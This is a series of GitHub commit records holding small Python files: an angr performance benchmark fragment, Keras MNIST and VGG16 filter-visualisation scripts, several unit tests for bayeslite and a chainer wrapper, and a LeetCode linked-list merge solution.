s_unicorn = p.factory.entry_state(add_options=so.unicorn | {so.STRICT_PAGE_ACCESS}, remove_options={so.LAZY_SOLVES}) # unicorn
pg_unicorn = p.factory.path_group(s_unicorn)
start = time.time()
pg_unicorn.run()
elapsed = time.time() - start
print "Elapsed %f sec" % elapsed
print pg_unicorn.one_deadended
def perf_unicorn_1():
p = angr.Project(os.path.join(test_location, 'binaries', 'tests', 'x86_64', 'perf_unicorn_1'))
s_unicorn = p.factory.entry_state(add_options=so.unicorn | {so.STRICT_PAGE_ACCESS}, remove_options={so.LAZY_SOLVES}) # unicorn
pg_unicorn = p.factory.path_group(s_unicorn)
start = time.time()
pg_unicorn.run()
elapsed = time.time() - start
print "Elapsed %f sec" % elapsed
print pg_unicorn.one_deadended
if __name__ == "__main__":
if len(sys.argv) > 1:
for arg in sys.argv[1:]:
print 'perf_' + arg
globals()['perf_' + arg]()
else:
for fk, fv in globals().items():
if fk.startswith('perf_') and callable(fv):
print fk
res = fv()
| bsd-2-clause | Python |
|
a2059d9c93553843094345ca857508e8cd7325c4 | Create mnist-keras.py | dhruvparamhans/mnist_keras | mnist-keras.py | mnist-keras.py | # Author: Hussein Al-barazanchi
# reading and saving the data are based on the code
# from the following link
# http://www.kaggle.com/users/9028/danb/digit-recognizer/convolutional-nn-in-python
# import numpy and pandas for array manipulationa and csv files
import numpy as np
import pandas as pd
# import keras necessary classes
from keras.models import Sequential
from keras.layers.core import Dense, Activation, Dropout, Flatten
from keras.layers.convolutional import Convolution2D, MaxPooling2D
from keras.optimizers import SGD
from keras.utils import np_utils
# Creating the model which consists of 3 conv layers followed by
# 2 fully conntected layers
print('creating the model')
# Sequential wrapper model
model = Sequential()
# first convolutional layer
model.add(Convolution2D(32,1,2,2))
model.add(Activation('relu'))
# second convolutional layer
model.add(Convolution2D(48, 32, 2, 2))
model.add(Activation('relu'))
model.add(MaxPooling2D(poolsize=(2,2)))
# third convolutional layer
model.add(Convolution2D(32, 48, 2, 2))
model.add(Activation('relu'))
model.add(MaxPooling2D(poolsize=(2,2)))
# convert convolutional filters to flatt so they can be feed to
# fully connected layers
model.add(Flatten())
# first fully connected layer
model.add(Dense(32*6*6, 128, init='lecun_uniform'))
model.add(Activation('relu'))
model.add(Dropout(0.25))
# second fully connected layer
model.add(Dense(128, 128, init='lecun_uniform'))
model.add(Activation('relu'))
model.add(Dropout(0.25))
# last fully connected layer which output classes
model.add(Dense(128, 10, init='lecun_uniform'))
model.add(Activation('softmax'))
# setting sgd optimizer parameters
sgd = SGD(lr=0.05, decay=1e-6, momentum=0.9, nesterov=True)
model.compile(loss='categorical_crossentropy', optimizer=sgd)
print('read data')
# reading training data
training = pd.read_csv('/home/mnist/train.csv')
# split training labels and pre-process them
training_targets = training.ix[:,0].values.astype('int32')
training_targets = np_utils.to_categorical(training_targets)
# split training inputs
training_inputs = (training.ix[:,1:].values).astype('float32')
# read testing data
testing_inputs = (pd.read_csv('/home/mnist/test.csv').values).astype('float32')
# pre-process training and testing data
max_value = np.max(training_inputs)
training_inputs /= max_value
testing_inputs /= max_value
mean_value = np.std(training_inputs)
training_inputs -= mean_value
testing_inputs -= mean_value
# reshaping training and testing data so it can be feed to convolutional layers
training_inputs = training_inputs.reshape(training_inputs.shape[0], 1, 28, 28)
testing_inputs = testing_inputs.reshape(testing_inputs.shape[0], 1, 28, 28)
print("Starting training")
model.fit(training_inputs, training_targets, nb_epoch=10, batch_size=1000, validation_split=0.1, show_accuracy=True)
print("Generating predections")
preds = model.predict_classes(testing_inputs, verbose=0)
def write_preds(preds, fname):
pd.DataFrame({"ImageId": list(range(1,len(preds)+1)), "Label": preds}).to_csv(fname, index=False, header=True)
print('Saving predictions')
write_preds(preds, "keras-mlp.csv")
| mit | Python |
|
e3b7b9e5f8ca1be061c71c764fd62d6aeed3fd43 | Add test suite for bqlmath. | probcomp/bayeslite,probcomp/bayeslite | tests/test_bqlmath.py | tests/test_bqlmath.py | # -*- coding: utf-8 -*-
# Copyright (c) 2010-2016, MIT Probabilistic Computing Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import itertools
import apsw
import pytest
from bayeslite import bayesdb_open
from bayeslite import bqlmath
from bayeslite.math_util import abserr
from bayeslite.util import cursor_value
def get_python_math_call(name, probe):
func = bqlmath.bqlmath_funcs[name]
if isinstance(probe, tuple):
return func(*probe)
else:
return func(probe)
def get_sql_math_call(name, probe):
if isinstance(probe, tuple):
return 'SELECT %s%s' % (name, str(probe))
else:
return 'SELECT %s(%s)' % (name, probe)
PROBES_FLOAT = [-2.5, -1, -0.1, 0, 0.1, 1, 2.5]
PROBES_TUPLE = itertools.combinations(PROBES_FLOAT, 2)
PROBES = itertools.chain(PROBES_FLOAT, PROBES_TUPLE)
FUNCS = bqlmath.bqlmath_funcs.iterkeys()
@pytest.mark.parametrize('name,probe', itertools.product(FUNCS, PROBES))
def test_math_func_one_param(name, probe):
# Retrieve result from python.
python_value_error = None
python_type_error = None
try:
result_python = get_python_math_call(name, probe)
except ValueError:
python_value_error = True
except TypeError:
python_type_error = True
# Retrieve result from SQL.
sql_value_error = None
sql_type_error = None
try:
with bayesdb_open(':memory') as bdb:
cursor = bdb.execute(get_sql_math_call(name, probe))
result_sql = cursor_value(cursor)
except ValueError:
sql_value_error = True
except (TypeError, apsw.SQLError):
sql_type_error = True
# Domain error on both.
if python_value_error or sql_value_error:
assert python_value_error and sql_value_error
# Arity error on both.
elif python_type_error or sql_type_error:
assert python_type_error and sql_type_error
# Both invocations succeeded, confirm results match.
else:
assert abserr(result_python, result_sql) < 1e-4
| apache-2.0 | Python |
|
2014f326eb73f7b30fe9cad8f30df80e7b8b3f26 | add first test | aweimeow/PyCat | tests/test_ipcheck.py | tests/test_ipcheck.py | class TestBoundaryValue:
def test_WeakNomral(self):
pass
| mit | Python |
|
d95a7d6017dd6a08d9c8df5af9c61ee2cb23d217 | add test code for wrapper.py | yasfmy/chainer_attention_model | tests/test_wrapper.py | tests/test_wrapper.py | import sys
sys.path.append('..')
import unittest
from wrapper import xp
from chainer import cuda
from chainer import Variable
class WrapperTestCase(unittest.TestCase):
def test_xp(self):
try:
cuda.check_cuda_available()
module = 'cupy'
except:
module = 'numpy'
self.assertEqual(xp.__name__, module)
def test_Zeros(self):
zeros = xp.Zeros((1, 1), dtype=xp.float32)
self.assertEqual(type(zeros), Variable)
self.assertEqual(zeros.data[0][0], 0.0)
self.assertEqual(zeros.data.dtype, xp.float32)
def test_Array(self):
arr = xp.Array([0], dtype=xp.int32)
self.assertEqual(type(arr), Variable)
self.assertEqual(arr.data[0], 0)
self.assertEqual(arr.data.dtype, xp.int32)
| mit | Python |
|
c9a1f5416e62a0d5311a9e692c08ad0fe49b9b18 | Add visualize_vgg16.py | aidiary/keras_examples,aidiary/keras_examples | dream/visualize_vgg16.py | dream/visualize_vgg16.py | from keras.applications.vgg16 import VGG16
from keras.layers import Input
from keras import backend as K
import numpy as np
import matplotlib.pyplot as plt
img_width, img_height, num_channels = 224, 224, 3
input_tensor = Input(shape=(img_height, img_width, num_channels))
model = VGG16(include_top=True, weights='imagenet', input_tensor=input_tensor)
layer_dict = dict([(layer.name, layer) for layer in model.layers])
model.summary()
def deprocess_image(x):
# Normalize the tensor to mean 0 and standard deviation 0.1
x -= x.mean()
x /= (x.std() + 1e-5)
x *= 0.1
# Clip to [0, 1]
x += 0.5
x = np.clip(x, 0, 1)
# Convert to RGB
x *= 255
x = np.clip(x, 0, 255).astype('uint8')
return x
def visualize_filter(layer_name, filter_index):
if layer_name not in layer_dict:
print("ERROR: invalid layer name: %s" % layer_name)
return
# The specified layer
layer = layer_dict[layer_name]
# layer.output_shape[-1] is the number of filters for any layer (with the TF backend)
# for the predictions layer it is the number of classes
if not (0 <= filter_index < layer.output_shape[-1]):
print("ERROR: invalid filter index: %d" % filter_index)
return
# Use the mean output of the specified filter in the specified layer as the loss
# the sign is negative because we actually want to maximize the layer output
if layer_name == 'predictions':
loss = - K.mean(layer.output[:, filter_index])
else:
loss = - K.mean(layer.output[:, :, :, filter_index])
# Compute the gradient of the loss with respect to the input image
# i.e. how much the output changes when the input image changes slightly
grads = K.gradients(loss, input_tensor)[0]
# Normalization trick:
# keeps the gradient at a reasonable scale when it is added to the image
grads /= (K.sqrt(K.mean(K.square(grads))) + K.epsilon())
# Define a function that takes an image and returns the loss and the gradient
iterate = K.function([input_tensor], [loss, grads])
# Start from an image containing random noise (a 4D tensor)
x = np.random.random((1, img_height, img_width, 3))
x = (x - 0.5) * 20 + 128
# Draw the initial image
img = deprocess_image(x[0])
plt.imshow(img)
plt.show()
if __name__ == '__main__':
visualize_filter('block1_conv1', 0)
visualize_filter('block5_conv3', 501)
visualize_filter('predictions', 64)
| mit | Python |
|
6733cc00015458c307272a3124857bf686b06fbb | Create h.py | samazgor/samazgor.github.com,samazgor/samazgor.github.com,samazgor/samazgor.github.com,samazgor/samazgor.github.com | h.py | h.py | print "Hello, World!"
| apache-2.0 | Python |
|
553009b8f0cb0396f266d10dc5b6010ad60e7a25 | Solve task #21 | Zmiecer/leetcode,Zmiecer/leetcode | 21.py | 21.py | # Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution(object):
def mergeTwoLists(self, l1, l2):
"""
:type l1: ListNode
:type l2: ListNode
:rtype: ListNode
"""
def step(l, y):
x = ListNode(l.val)
y.next = x
y = y.next
l = l.next
return [l, y]
if not l1 or not l2:
return l1 or l2
x = y = ListNode(0)
while (l1 is not None) and (l2 is not None):
if l1.val < l2.val:
l1, y = step(l1, y)
else:
l2, y = step(l2, y)
if l1 is None:
y.next = l2
else:
y.next = l1
return x.next
| mit | Python |